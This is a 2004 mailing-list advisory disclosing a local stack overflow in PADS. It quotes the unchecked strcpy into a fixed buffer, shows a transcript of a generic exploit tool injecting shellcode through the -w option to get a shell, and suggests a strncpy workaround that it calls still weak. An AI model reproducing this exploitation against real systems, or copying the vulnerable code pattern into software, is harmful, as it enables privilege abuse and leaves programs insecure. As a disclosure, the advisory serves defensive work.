[<prev] [next>] [day] [month] [year] [list]
Message-ID: <412537A8.3070509@cr-secure.net>
From: chris at cr-secure.net (ChrisR-)
Subject: PADS Simple Stack Overflow
Pads Stack Overflow Advisory
---[ Vulnerable Application ]---
Pads - Passive Asset Detection System
(from the README ^)
http://passive.sourceforge.net/
Vulnerable to a stack overflow.
---[ Vulnerable Code ]---
From pads.c
<code snip>
......
char report_file[255] = "assets.csv";
.........
case 'w':
strcpy(report_file, optarg);
break;
............
</code snip>
Very simple stack overflow. Can be exploited locally with
www.cr-secure.net/ex_bof.c (a lazy mans local exploit).
_______________________________________________-
/> ex_bof
Please enter the values as requested . . .
Enter the vulnerable program path: pads
Enter the vulnerable program name: pads
Enter any arguments the program requires: -w
Enter an offset: 0
Enter a buffer size: 600
Enter the nop sled size: 400
The Return Value Is: 0xbffff8b8
Injecting Shellcode . . .
pads - Passive Asset Detection System
v1.1 - 08/14/04
Matt Shelton <matt@...tshelton.com>
sh-3.00$ id
uid=1000(chris) gid=1000(chris)
groups=20(dialout),24(cdrom),25(floppy),1000(chris)
sh-3.00$
________________________________________________
This is typically only a big deal if 'pads' is uid=0. Which it is not by
default when compiled from source,
which is how I built it. Very low danger here.
---[ Temporary work around ]---
Well for now you could change strcpy() to
.......
strncpy(report_file, optarg, 255); // still not very secure, its
a 'workaround'
.......
Matt Shelton (author) was notified of this, a new version 1.1.1 is now
available. Pads is still a beta
application but shows a lot of promise. Check it out. The link is at the
top of this advisory.
---[ Hello ]---
Mattjf && tlharris && Think && others
www.cr-secure.net
chris@...secure.net
ChrisR-
Powered by blists - more mailing lists